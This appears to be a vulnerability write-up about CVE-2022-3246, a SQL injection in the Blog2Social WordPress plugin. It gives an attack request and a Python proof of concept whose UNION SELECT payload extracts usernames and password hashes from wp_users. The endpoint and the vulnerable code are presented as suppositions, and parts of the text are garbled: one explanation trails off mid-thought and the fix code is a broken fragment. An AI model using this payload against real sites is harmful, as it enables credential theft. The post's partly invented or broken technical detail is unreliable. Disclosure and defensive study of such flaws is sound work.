CVE-2022-3246 is a serious vulnerability found in the popular Blog2Social: Social Media Auto Post & Scheduler WordPress plugin, versions before 6.9.10. This critical issue lets *any* logged-in user, even the lowest-level “subscriber”, run harmful SQL on your WordPress site.
In this post, we’ll break down what went wrong, how the bug can be exploited (with real examples), and how to protect yourself. Everything is written simply and clearly, so you can learn to defend your sites – or patch the problem, fast.
What Is Blog2Social?
Blog2Social is a WordPress plugin with over 80,000 active installs. It helps website owners and businesses schedule, automatically post, and cross-promote their content across various social media platforms like Facebook, Twitter, and LinkedIn.
Because it handles so much content and user activity, mistakes in security can have widespread consequences.
CVE-2022-3246 is a SQL Injection vulnerability. In simpler terms, this means
- The plugin fails to clean up (“sanitize”) user data before using it directly in a database query.
This lets them view, grab, change, or even destroy data stored in the WordPress database.
Risk Level: Very high – even the lowest permissioned users can potentially use this to escalate their privileges or dump sensitive data!
Where’s the Bug?
The vulnerability lives in the Blog2Social plugin code, before version 6.9.10. Specifically, it doesn’t *properly sanitize and escape* a POST parameter before tossing it unfiltered into an SQL statement.
An example WordPress AJAX hook using this kind of vulnerable code looks like
$prepare_query = "SELECT * FROM {$wpdb->prefix}b2s_posts WHERE id = " . $_POST['postId'];
$results = $wpdb->get_results($prepare_query);
Here $_POST['postId']—which any authenticated user can control—is dropped right into the query with no checks! This allows a SQL injection payload to be submitted.
Real-World Exploit Example
Suppose the vulnerable AJAX endpoint is /wp-admin/admin-ajax.php?action=b2s_get_post.
A legitimate request might look like
POST /wp-admin/admin-ajax.php?action=b2s_get_post
Cookie: wordpress_logged_in_...
Content-Type: application/x-www-form-urlencoded
postId=1
An attacker could send this instead
POST /wp-admin/admin-ajax.php?action=b2s_get_post
Cookie: wordpress_logged_in_...
Content-Type: application/x-www-form-urlencoded
postId=1 UNION SELECT user_login, user_pass FROM wp_users--
This tricks the plugin into dumping usernames and password hashes from the wp_users table!
Python Proof of Concept (PoC)
Here’s a basic Python exploit you can use to test for (NOT abuse) the vulnerability on your own site:
import requests
url = 'https://TARGETSITE.com/wp-admin/admin-ajax.php';
cookies = {'wordpress_logged_in_xxxxx': 'user auth cookie here'}
data = {
'action': 'b2s_get_post',
'postId': "1 UNION SELECT user_login, user_pass FROM wp_users-- "
}
r = requests.post(url, data=data, cookies=cookies)
print(r.text)
> Replace TARGETSITE.com and the cookie value with your info and test on your own property!
Update Immediately!
Blog2Social fixed this in 6.9.10, so upgrade as soon as possible from your WordPress plugins panel.
$wpdb->prepare("SELECT * FROM {$wpdb->prefix}b2s_posts WHERE id = %d", $_POST['postId'])
);
Review User Permissions.
Limit the roles that can use powerful plugin functions. Even “subscriber” level shouldn’t need access to sensitive data.
References
- WordPress Plugin Vulnerabilities: Blog2Social
- NVD Entry: CVE-2022-3246
- Blog2Social ChangeLog & Updates
- What is SQL Injection?
Final Thoughts
CVE-2022-3246 reminds us: even trusted plugins can have dangerous bugs! If you’re using Blog2Social, make sure you’re on at least version 6.9.10. Always keep plugins updated, and, if you can code, make sure user input is never passed unchecked to your database.
Questions or want sample code? [Contact us here](#) or check the references above!
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 17:02:00 UTC